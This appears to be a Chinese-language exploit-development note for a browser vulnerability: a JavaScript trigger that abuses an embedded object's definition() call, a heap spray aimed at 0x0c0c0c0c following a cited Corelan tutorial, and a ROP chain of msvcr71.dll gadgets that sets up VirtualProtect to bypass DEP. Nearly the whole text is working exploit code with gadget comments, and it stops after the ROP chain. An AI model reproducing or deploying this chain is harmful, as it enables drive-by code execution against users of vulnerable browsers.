采用inking 大牛的方法
function exploit()
{
obj = document.getElementById('oo').object;
var src = unescape("%u0c0c%u0c0c");
while (src.length < 0x1002) src += src;
src = "\\\\xxx" + src;
src = src.substr(0, 0x1000 - 10);
var pic = document.createElement("img");
pic.src = src;
pic.nameProp;
obj.definition(1);
}
采用 https://www.corelan.be/index.php/2011/12/31/exploit-writing-tutorial-part-11-heap-spraying-demystified/#IE6_UserSize_0x7ffe0 上面的喷射方法,准确定位0c0c0c0c
rop模块
var rop = unescape("%u0bfc%u0c0c"); // get ecx mov ecx,[eax] call ecx+18
rop+=unescape("%u6402%u7c37"); // POP EBP // RETN [msvcr71.dll] 跳过下面的
rop+=unescape("%u24e5%u7c34");// // POP EBP MOV EAX,1 POP EBP POP EDI POP ESI POP EBX MOV ESP,EBP POP EBP retn change stack point
// 开始正式ROP
rop+=unescape("%u6402%u7c37");// POP EBP // RETN [msvcr71.dll]
rop+=unescape("%u6402%u7c37");// POP EBP // RETN [msvcr71.dll]
rop+=unescape("%u7f97%u7c34"); // POP EAX // RETN [msvcr71.dll]
rop+=unescape("%uf800%uffff"); // Value to negate, will become %u00000201 (dwSize)
rop+=unescape("%u1e05%u7c35"); // NEG EAX // RETN [msvcr71.dll]
rop+=unescape("%u4901%u7c35"); // POP EBX // RETN [msvcr71.dll]
rop+=unescape("%uffff%uffff");
rop+=unescape("%u5255%u7c34"); // INC EBX // FPATAN // RETN [msvcr71.dll]
rop+=unescape("%u2174%u7c35"); // ADD EBX,EAX // XOR EAX,EAX // INC EAX // RETN [msvcr71.dll]
rop+=unescape("%u4f87%u7c34"); // POP EDX // RETN [msvcr71.dll]
rop+=unescape("%uffc0%uffff"); // Value to negate, will become %u00000040
rop+=unescape("%u1eb1%u7c35"); // NEG EDX // RETN [msvcr71.dll]
rop+=unescape("%ud201%u7c34"); // POP ECX // RETN [msvcr71.dll]
rop+=unescape("%ub001%u7c38"); // &Writable location [msvcr71.dll]
rop+=unescape("%ub8d7%u7c34"); // POP EDI // RETN [msvcr71.dll]
rop+=unescape("%u7f98%u7c34"); // RETN (ROP NOP) [msvcr71.dll]
rop+=unescape("%u4802%u7c36"); // POP ESI // RETN [msvcr71.dll]
rop+=unescape("%u15a2%u7c34"); // JMP [EAX] [msvcr71.dll]
rop+=unescape("%u7f97%u7c34"); // POP EAX // RETN [msvcr71.dll]
rop+=unescape("%ua151%u7c37"); // ptr to &VirtualProtect() - 0x0EF [IAT msvcr71.dll]
rop+=unescape("%u8c81%u7c37"); // PUSHAD // ADD AL,0EF // RETN [msvcr71.dll]
rop+=unescape("%u5c30%u7c34"); // ptr to 'push esp // ret ' [msvcr71.dll]